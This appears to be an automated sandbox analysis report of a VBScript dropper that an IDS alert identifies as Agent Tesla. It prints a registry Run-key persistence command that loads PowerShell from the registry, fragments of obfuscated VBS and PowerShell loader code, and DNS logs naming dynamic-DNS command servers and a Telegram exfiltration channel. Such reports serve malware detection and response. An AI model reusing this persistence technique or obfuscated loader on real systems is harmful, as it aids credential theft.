20:47:08 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Attractant %tullio% -w 1 $Sporing21=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Premodify;%tullio% ($Sporing21)
20:47:16 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Attractant %tullio% -w 1 $Sporing21=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Premodify;%tullio% ($Sporing21)
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
Preview: @...e...........................................................

Process: C:\Program Files (x86)\Internet Explorer\ieinstal.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 832829
Entropy (8bit): 5.0885712239317815
Encrypted: false
SSDEEP: 12288:cJ17c8wKTCYUZHz+ri3+U1yGgRfEDn5XJakQUEGkmKs7gPZ8PNMnkbV3Bu5qc:M7/AEi3o0n5ILsLbVxuN
MD5: 4C8882314A2E1B18655660C964A5EBF6
SHA1: 5FA1E07C13863BEC4C07FFEEE7770D8597ADC3FB
SHA-256: 6C7CC2AFF7208B2C622C28BED2101EC371FAE91B6981568515842B9269DFFD0E
SHA-512: E00575BAB08F2C1AD8942EFAE3ED9AF5ABDD5439493C11987091BCD955942C19ED6C213DE1B1DEA70EF8519BF16996FF4571A3A5B6FD1F4FFC1CC1A61369D9FF
Malicious: false
Preview: Tr8 = Tr8 & "6wLTqusC"..Tr8 = Tr8 & "JDqB7QADAA"..Tr8 = Tr8 & "BxAZt"..Tr8 = Tr8 & "xAZuL"..Tr8 = Tr8 & "VCQI6wJzbHE"..Tr8 = Tr8 & "Bm4t8JATrA"..Tr8 = Tr8 & "qkncQG"..Tr8 = Tr8 & "bievrAp"..Tr8 = Tr8 & "kGcQGbg"..Tr8 = Tr8 & "cOcAAAA"..Tr8 = Tr8 & "cQGb6wL"..Tr8 = Tr8 & "I11PrAtYFc"..Tr8 = Tr8 & "QGbak"..Tr8 = Tr8 & "DrArrE6wIDR"..Tr8 = Tr8 & "HEBm+sC"..Tr8 = Tr8 & "xm6J63"..Tr8 = Tr8 & "EBm+s"..Tr8 = Tr8 & "CUnnHgwABA"..Tr8 = Tr8 & "AAAABAAcQG"..Tr8 = Tr8 & "b6wL+"..Tr8 = Tr8 & "roHDA"..Tr8 = Tr8 & "AEAAOs"..Tr8 = Tr8 & "C8kBxAZtTcQ"..Tr8 = Tr8 & "Gb6wJIMIn"..Tr8 = Tr8 & "r6wLM+esC"..Tr8 = Tr8 & "2EWJu"..Tr8 = Tr8 & "wQBAAB"..Tr8 = Tr8 & "xAZvrA"..Tr8 = Tr8 & "vXtgcMEAQAA"..Tr8 = Tr8 & "6wJl5"..Tr8 = Tr8 & "OsCsXlT"..Tr8 = Tr8 & "6wKMRXEB"..Tr8 = Tr8 & "m2r/c"..Tr8 = Tr8 & "QGbcQ"..Tr8 = Tr8 & "Gbg8I"..Tr8 = Tr8 & "F6wLi"..Tr8 = Tr8 & "73EBmzH"..Tr8 = Tr8 & "2cQGbcQGb"..Tr8 = Tr8 & "McnrAky"..Tr8 = Tr8 & "ZcQGbixr"..Tr8 = Tr8 & "rAheQ6wJVEE"..Tr8 = Tr8 & "HrAgPc6wLrc"..Tr8 = Tr8 & "Dk

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 30
Entropy (8bit): 3.964735178725505
Encrypted: false
SSDEEP: 3:IBVFBWAGRHneyy:ITqAGRHner
MD5: 9F754B47B351EF0FC32527B541420595
SHA1: 006C66220B33E98C725B73495FE97B3291CE14D9
SHA-256: 0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
SHA-512: C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
Malicious: false
Preview: NordVPN directory not found!..
File type: ASCII text, with CRLF line terminators
Entropy (8bit): 5.08517872813569
TrID:
File name: IMG_2022028022-0120.vbs
File size: 837420
MD5: 752418aa9de96e0fc941ae1e7e33c906
SHA1: bb67df2d8a4b525b42211630386e4b51a97255a3
SHA256: cdce0391762117cc926a2131b5e0ec7724b69d1224dbabc7a3f351dfebf9b9bf
SHA512: 930b079189279aa377bca9b64471ecd0956522715e89eebc1a818166bbd6d309491ec6bd8714d4cc5db34ca824627b2e087e79f7b1d9ad7033c38dfd0d56c3c7
SSDEEP: 12288:S6SeO/ZNca+0J/FEituFvSnQ+7XPwVr2rhs+MDRpmrtVUBM/LB2g+ZImPkQN3BSq:EKpfTGVKaQNxSq
TLSH: 1E05A06394151590870DADAE884ADDF8CCA1021EB513241607B0BB7E2F6F8E8BDDB5DF
File Content Preview: Un9 = Un9 & "cQGbcQGbge0"..Un9 = Un9 & "AAwAAcQGb6w"..Un9 = Un9 & "LhDItUJAjrA"..Un9 = Un9 & "rL/cQGbi3"..Un9 = Un9 & "wkBOsCqLX"..Un9 = Un9 & "rAmpUietxAZ"..Un9 = Un9 & "txAZuBw5wAA"..Un9 = Un9 & "ABxAZtx"..Un9 = Un9 & "AZtTc"..Un9 = Un9 & "QGb6wJJP"..Un
Icon Hash: e8d69ece869a9ec4
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/28/22-20:47:47.307107 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49881 | 443 | 192.168.11.20 | 149.154.167.220
TCP packets (Timestamp | Source Port | Dest Port | Source IP | Dest IP):
                        Nov 28, 2022 20:45:13.336102009 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.336159945 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.336214066 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.336272001 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.336381912 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.336391926 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.336474895 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.336536884 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.336594105 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.336647987 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.336703062 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.336709976 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.336782932 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.336816072 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.336863041 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.336895943 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.336952925 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.337018013 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.337042093 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.337090015 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.337107897 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.337177038 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.337193966 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.337253094 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.337275982 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.337438107 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.337439060 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.337460041 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.337543964 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.337605953 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.337665081 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.337693930 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.337734938 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.337775946 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.337846994 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.338020086 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.375611067 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.375674963 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.375912905 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.376435995 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.376504898 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.376560926 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.376617908 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.376627922 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.376687050 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.376707077 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.376768112 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.376789093 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.376867056 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.376921892 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.376956940 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.376998901 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.377038002 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.377080917 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.377118111 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.377168894 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.377234936 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.377270937 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.377310038 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.377326965 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.377397060 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.377403021 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.377477884 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.377484083 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.377557993 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.377583027 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.377641916 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.377645016 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.377722979 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.377727032 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.377801895 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.377808094 CET4981180192.168.11.20172.67.169.218
                        Nov 28, 2022 20:45:13.377882004 CET8049811172.67.169.218192.168.11.20
                        Nov 28, 2022 20:45:13.377907038 CET4981180192.168.11.20172.67.169.218
                         Timestamp                            Source IP      Dest IP  Trans ID  OP Code             Name                          Type            Class        DNS over HTTPS
                         Nov 28, 2022 20:45:12.923213005 CET  192.168.11.20  1.1.1.1  0x74b7    Standard query (0)  sinopbisikletkiralama.com     A (IP address)  IN (0x0001)  false
                         Nov 28, 2022 20:45:16.157552958 CET  192.168.11.20  1.1.1.1  0xd31d    Standard query (0)  onedrive.live.com             A (IP address)  IN (0x0001)  false
                         Nov 28, 2022 20:45:16.806633949 CET  192.168.11.20  1.1.1.1  0xb0bd    Standard query (0)  f65kcg.am.files.1drv.com      A (IP address)  IN (0x0001)  false
                         Nov 28, 2022 20:45:17.799076080 CET  192.168.11.20  1.1.1.1  0xddb9    Standard query (0)  backupfrontmanny.duckdns.org  A (IP address)  IN (0x0001)  false
                         Nov 28, 2022 20:45:20.153374910 CET  192.168.11.20  1.1.1.1  0xf365    Standard query (0)  myfrontmannyfive.ddns.net     A (IP address)  IN (0x0001)  false
                         Nov 28, 2022 20:46:20.001605988 CET  192.168.11.20  1.1.1.1  0xf425    Standard query (0)  backupfrontmanny.duckdns.org  A (IP address)  IN (0x0001)  false
                         Nov 28, 2022 20:46:22.374329090 CET  192.168.11.20  1.1.1.1  0x6a53    Standard query (0)  myfrontmannyfive.ddns.net     A (IP address)  IN (0x0001)  false
                         Nov 28, 2022 20:47:05.561343908 CET  192.168.11.20  1.1.1.1  0xfa4b    Standard query (0)  onedrive.live.com             A (IP address)  IN (0x0001)  false
                         Nov 28, 2022 20:47:06.608068943 CET  192.168.11.20  1.1.1.1  0x5011    Standard query (0)  f64nqg.am.files.1drv.com      A (IP address)  IN (0x0001)  false
                         Nov 28, 2022 20:47:23.534564972 CET  192.168.11.20  1.1.1.1  0xe2f0    Standard query (0)  backupfrontmanny.duckdns.org  A (IP address)  IN (0x0001)  false
                         Nov 28, 2022 20:47:25.891343117 CET  192.168.11.20  1.1.1.1  0xa39d    Standard query (0)  myfrontmannyfive.ddns.net     A (IP address)  IN (0x0001)  false
                         Nov 28, 2022 20:47:47.203263998 CET  192.168.11.20  1.1.1.1  0x54dc    Standard query (0)  api.telegram.org              A (IP address)  IN (0x0001)  false
                         Nov 28, 2022 20:48:28.473647118 CET  192.168.11.20  1.1.1.1  0xbbf9    Standard query (0)  backupfrontmanny.duckdns.org  A (IP address)  IN (0x0001)  false
                         Nov 28, 2022 20:48:30.845830917 CET  192.168.11.20  1.1.1.1  0xdc6b    Standard query (0)  myfrontmannyfive.ddns.net     A (IP address)  IN (0x0001)  false
                         Nov 28, 2022 20:49:33.397072077 CET  192.168.11.20  1.1.1.1  0xa92e    Standard query (0)  backupfrontmanny.duckdns.org  A (IP address)  IN (0x0001)  false
                         Nov 28, 2022 20:49:35.754528999 CET  192.168.11.20  1.1.1.1  0x66f3    Standard query (0)  myfrontmannyfive.ddns.net     A (IP address)  IN (0x0001)  false
                         Nov 28, 2022 20:50:36.851831913 CET  192.168.11.20  1.1.1.1  0x912a    Standard query (0)  backupfrontmanny.duckdns.org  A (IP address)  IN (0x0001)  false
                         Nov 28, 2022 20:50:39.225626945 CET  192.168.11.20  1.1.1.1  0x2109    Standard query (0)  myfrontmannyfive.ddns.net     A (IP address)  IN (0x0001)  false
                         Nov 28, 2022 20:51:36.489748001 CET  192.168.11.20  1.1.1.1  0x8d94    Standard query (0)  backupfrontmanny.duckdns.org  A (IP address)  IN (0x0001)  false
                         Nov 28, 2022 20:51:38.846743107 CET  192.168.11.20  1.1.1.1  0xd5da    Standard query (0)  myfrontmannyfive.ddns.net     A (IP address)  IN (0x0001)  false
                         Nov 28, 2022 20:52:36.570648909 CET  192.168.11.20  1.1.1.1  0x4d71    Standard query (0)  backupfrontmanny.duckdns.org  A (IP address)  IN (0x0001)  false
                         Nov 28, 2022 20:52:39.084089041 CET  192.168.11.20  1.1.1.1  0x7cbe    Standard query (0)  myfrontmannyfive.ddns.net     A (IP address)  IN (0x0001)  false
                         Timestamp                            Source IP  Dest IP        Trans ID  Reply Code    Name                          CName                                 Address          Type                    Class        DNS over HTTPS
                         Nov 28, 2022 20:45:13.115240097 CET  1.1.1.1    192.168.11.20  0x74b7    No error (0)  sinopbisikletkiralama.com     -                                     172.67.169.218   A (IP address)          IN (0x0001)  false
                         Nov 28, 2022 20:45:13.115240097 CET  1.1.1.1    192.168.11.20  0x74b7    No error (0)  sinopbisikletkiralama.com     -                                     104.21.95.74     A (IP address)          IN (0x0001)  false
                         Nov 28, 2022 20:45:16.167279005 CET  1.1.1.1    192.168.11.20  0xd31d    No error (0)  onedrive.live.com             odc-web-geo.onedrive.akadns.net       -                CNAME (Canonical name)  IN (0x0001)  false
                         Nov 28, 2022 20:45:16.870518923 CET  1.1.1.1    192.168.11.20  0xb0bd    No error (0)  f65kcg.am.files.1drv.com      am-files.fe.1drv.com                  -                CNAME (Canonical name)  IN (0x0001)  false
                         Nov 28, 2022 20:45:16.870518923 CET  1.1.1.1    192.168.11.20  0xb0bd    No error (0)  am-files.fe.1drv.com          odc-am-files-geo.onedrive.akadns.net  -                CNAME (Canonical name)  IN (0x0001)  false
                         Nov 28, 2022 20:45:17.912461042 CET  1.1.1.1    192.168.11.20  0xddb9    No error (0)  backupfrontmanny.duckdns.org  -                                     84.38.134.104    A (IP address)          IN (0x0001)  false
                         Nov 28, 2022 20:45:20.169534922 CET  1.1.1.1    192.168.11.20  0xf365    No error (0)  myfrontmannyfive.ddns.net     -                                     37.0.14.209      A (IP address)          IN (0x0001)  false
                         Nov 28, 2022 20:46:20.117671967 CET  1.1.1.1    192.168.11.20  0xf425    No error (0)  backupfrontmanny.duckdns.org  -                                     84.38.134.104    A (IP address)          IN (0x0001)  false
                         Nov 28, 2022 20:46:22.390732050 CET  1.1.1.1    192.168.11.20  0x6a53    No error (0)  myfrontmannyfive.ddns.net     -                                     37.0.14.209      A (IP address)          IN (0x0001)  false
                         Nov 28, 2022 20:47:05.572294950 CET  1.1.1.1    192.168.11.20  0xfa4b    No error (0)  onedrive.live.com             odc-web-geo.onedrive.akadns.net       -                CNAME (Canonical name)  IN (0x0001)  false
                         Nov 28, 2022 20:47:06.684719086 CET  1.1.1.1    192.168.11.20  0x5011    No error (0)  f64nqg.am.files.1drv.com      am-files.fe.1drv.com                  -                CNAME (Canonical name)  IN (0x0001)  false
                         Nov 28, 2022 20:47:06.684719086 CET  1.1.1.1    192.168.11.20  0x5011    No error (0)  am-files.fe.1drv.com          odc-am-files-geo.onedrive.akadns.net  -                CNAME (Canonical name)  IN (0x0001)  false
                         Nov 28, 2022 20:47:23.645587921 CET  1.1.1.1    192.168.11.20  0xe2f0    No error (0)  backupfrontmanny.duckdns.org  -                                     84.38.134.104    A (IP address)          IN (0x0001)  false
                         Nov 28, 2022 20:47:25.907448053 CET  1.1.1.1    192.168.11.20  0xa39d    No error (0)  myfrontmannyfive.ddns.net     -                                     37.0.14.209      A (IP address)          IN (0x0001)  false
                         Nov 28, 2022 20:47:47.212587118 CET  1.1.1.1    192.168.11.20  0x54dc    No error (0)  api.telegram.org              -                                     149.154.167.220  A (IP address)          IN (0x0001)  false
                         Nov 28, 2022 20:48:28.608522892 CET  1.1.1.1    192.168.11.20  0xbbf9    No error (0)  backupfrontmanny.duckdns.org  -                                     84.38.134.104    A (IP address)          IN (0x0001)  false
                         Nov 28, 2022 20:48:30.866609097 CET  1.1.1.1    192.168.11.20  0xdc6b    No error (0)  myfrontmannyfive.ddns.net     -                                     37.0.14.209      A (IP address)          IN (0x0001)  false
                         Nov 28, 2022 20:49:33.510668039 CET  1.1.1.1    192.168.11.20  0xa92e    No error (0)  backupfrontmanny.duckdns.org  -                                     84.38.134.104    A (IP address)          IN (0x0001)  false
                         Nov 28, 2022 20:49:35.766369104 CET  1.1.1.1    192.168.11.20  0x66f3    No error (0)  myfrontmannyfive.ddns.net     -                                     37.0.14.209      A (IP address)          IN (0x0001)  false
                         Nov 28, 2022 20:50:36.982223034 CET  1.1.1.1    192.168.11.20  0x912a    No error (0)  backupfrontmanny.duckdns.org  -                                     84.38.134.104    A (IP address)          IN (0x0001)  false
                         Nov 28, 2022 20:50:39.238917112 CET  1.1.1.1    192.168.11.20  0x2109    No error (0)  myfrontmannyfive.ddns.net     -                                     37.0.14.209      A (IP address)          IN (0x0001)  false
                         Nov 28, 2022 20:51:36.603502989 CET  1.1.1.1    192.168.11.20  0x8d94    No error (0)  backupfrontmanny.duckdns.org  -                                     84.38.134.104    A (IP address)          IN (0x0001)  false
                         Nov 28, 2022 20:51:38.862339020 CET  1.1.1.1    192.168.11.20  0xd5da    No error (0)  myfrontmannyfive.ddns.net     -                                     37.0.14.209      A (IP address)          IN (0x0001)  false
                         Nov 28, 2022 20:52:36.688539982 CET  1.1.1.1    192.168.11.20  0x4d71    No error (0)  backupfrontmanny.duckdns.org  -                                     84.38.134.104    A (IP address)          IN (0x0001)  false
                         Nov 28, 2022 20:52:39.096400976 CET  1.1.1.1    192.168.11.20  0x7cbe    No error (0)  myfrontmannyfive.ddns.net     -                                     37.0.14.209      A (IP address)          IN (0x0001)  false
                        • api.telegram.org
                        • sinopbisikletkiralama.com


                        Target ID:0
                        Start time:20:44:26
                        Start date:28/11/2022
                        Path:C:\Windows\System32\wscript.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG_2022028022-0120.vbs"
                        Imagebase:0x7ff677550000
                        File size:170496 bytes
                        MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        Target ID:3
                        Start time:20:44:31
                        Start date:28/11/2022
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                         Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Badeanstalt = ...
Ar`$ReLPrsDeeLarSluArnFodSueDrrJesBegGleFllSksBleAnrLa0St;Sa`$hisOmiCozUneNo=mi`$PaLAmeStuIncQuiGofaleXerte.MacDeoCouennlitEm-Di3Sc5Qu3Bi;So`$GiLFrsFleSkrLvuPanKodloeDarFrsExgnoePrlPesBuePsrli1Rh Te=Fl SeHImTSkBCh Hy'UnBJaEBiBRa6Ih9MeCCa9Br6Ek9Ga1gr8Se0Kv8Te8StCmaBMaBRe7Pe9Fr0Wh8AbBSu9Kl1Be8MeCSu8Ci8Fl8be0FrCUnBPrANaCAf8DeBSu9Me1An8Gs0Hj9Rs7Re8DeASk9Ov5BeBEr6Ha8Li0Lf9Eg7Ly9Sp3Pe8UdCHe8Mi6No8Ju0Ha9Fr6AnCSuBToAGu8Ar8Be4Ul9Ph7Re9Pa6ge8BeDVa8Dr4Bu8By9LuBBr8HoDStFStDKoFTuAHe6La8reAVi9Sk5Sr9MaCCoCVeDSwCFu1DyAUn9ex8Rs0Fr9Vo0Tr8Fl6En8SyCUn8un3Ge8Li0St9Un7OkCAd9BuCat5ElDIn6GaDCo0efDSi6CoCGn9HjCVa5HoCvo1To8PrASp9Be7Pa8ReCUnCIn9UnCWr5InCPa1Vi9As6Ap8HyCCh9BlFSa8Hu0NiCBlCOm'Br;Lu&Ov(Ve`$BeSSttDuyDerInkMaePrtAlrAnnJneSp7En)Ek Ti`$NoLBesSnedirnauRenStdCaeWhrPrsLigRueLalCisDoeInrEx1Sr;El`$AmLAnsTreParPruGanSudLueAkrTasRagsteBolInsraeOlrGl2So Or=Si BrHScTSeBAn Ve'PnCUn1Ch9Fr3St8Tr4Co9Va7ToBEnAVi9Fe7Ex9Pa0Im8AnBFo8Ta8Ku8An0BoCBu5UbDCh8FoCDe5ToBCeEdeBOv6Fl9HiChe9Pu6Sk9Bl1Ud8Sp0Cy8Et8TaCVaBKnBSu7To9Fe0Ne8EkBSr9Ak1En8UnCBe8St8Be8He0MaCStBUdAAnCHe8AaBov9In1Pi8ud0Pl9Op7Pa8ZaABi9Fj5FuBMo6Ga8Vo0Sc9Bi7Tr9Di3Di8MaCOf8Up6Fo8Ep0Ko9Op6UnCSnBDiANo8dr8Un4Ka9St7ba9Al6Fi8arDSp8Aa4Ge8Bo9GhBPo8upDPsFFoDTrFDrAIn2Di8Be0Da9Pr1RiAga1Hj8Co0Ad8Bl9in8Pr0Ek8Ji2Al8He4Ja9fa1Af8He0FoAgl3Ve8UdAGe9De7BrARe3Ob9No0Sp8FjBim8Bi6Al9Le1Ra8TvCAp8SiApr8LyBIrBTe5In8MaAGe8FoCTo8DuBPa9Ku1Ka8Fu0En9Hk7BrCArDFoCBr1BiABeAKo9Al1Br8GaDTh8LuCTh8udBStDNa6EnCFu9DoCEx5SaCPoDUnASk2TuAPh1PhBNo1BeCMe5GaASl5SaCNiDPaBspEUnACaCSp8BeBRe9Fy1SnBMa5Wo9Co1Li9Ru7PiBFo8DeCBl9EgBKuEtrASoCOv8SuBHi9In1ReBBr5so9Xy1Be9Mu7BeBSc8LaCChCMaCPr5SuCGuDAsBBiECoBTe3Sm8SiAAp8MyCUt8St1PaBBl8LaCHyCbaCAmCShCngCGe'Pu;Fr&Fo(No`$BrSSutInytrrPakSoeAntSkrFanuneAf7No)De Tr`$ReLInsEgeSmrTauLanKadSpeOprAbsTegGleBrlKasSteInrst2In;Fa`$BlLLmsRoeBjrsauMinEndTreKarHesFagSkeGulTvsCheBurBa3Im Es=St BaHTaTdrBBo 
